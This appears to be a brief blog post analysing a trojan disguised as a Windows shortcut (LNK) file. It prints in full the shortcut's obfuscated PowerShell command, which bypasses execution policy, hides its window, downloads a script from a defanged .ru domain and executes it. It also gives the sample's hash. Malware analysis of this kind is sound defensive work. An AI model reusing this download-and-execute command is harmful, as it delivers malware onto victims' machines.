Trojan malware – Microsoft Shortcut (LNK)


I downloaded this sample for malware analysis and change the extension to .LNK which is Microsoft Shortcut.

Right clicked on file and navigated to shortcut and found that there is target is PowerShell embedded

blg-2

Below is PowerShell script which will drop another PowerShell script from the URL.

URL is http[:]// timebounder[.]ru and downloading PowerShell script pps[.]ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(‘aWV4’));sal calc $je;$mM=((New-Object Net.WebClient)).DownloadString(‘http[:]//timebounder[.]ru/ pps.ps1’);calc $mM

blg-3

I tried running script but the website is down (http[:]// timebounder[.]ru) and unable to download PowerShell script.

Virustotal – https://www.virustotal.com/#/file/4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98/detection

SHA256 – 4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.